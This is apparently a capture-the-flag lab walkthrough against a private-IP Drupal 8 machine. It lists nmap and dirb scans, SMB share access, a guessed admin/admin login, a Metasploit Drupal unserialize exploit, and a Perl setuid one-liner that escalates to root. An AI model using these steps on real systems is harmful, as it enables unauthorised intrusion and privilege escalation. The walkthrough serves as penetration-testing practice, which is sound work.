Using nmap-A –T4 –p- 192.168.1.13 –vv
Running dirb :
As we can see in nmap scan, port 139 and 445 are open so let’s exploit them:
Let’s connect to smb service using smbclient \\\\192.168.1.13\\naruto:
Now we download the text file, we use: get uzumaki.txt
Well with some luck I tried different names as path and the one that worked out is gara, and I can log in as admin and password also admin.
Now the host is using Drupal 8 as we can see:
Searching searchsploit for Drupal 8 came with :
So now we going to use metasploit and search for drupal unserialize : use exploit/unix/webapp/drupal_restws_unserialize
And we have a shell, lets break out of it by python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
Changed directory to home and found two users narato and yashika , the user yashika has a file perl, which we can use it to escalate our privilege to root.
Simply we can type ./perl -e ‘use POSIX (setuid); POSIX::setuid(0); exec “/bin/bash”;’
And then if you id you can see you are root, navigate to the root directory and read the final.txt file and you are done
Hacking Tips & Tricks - Labs Walkthrough - Infosec Articles 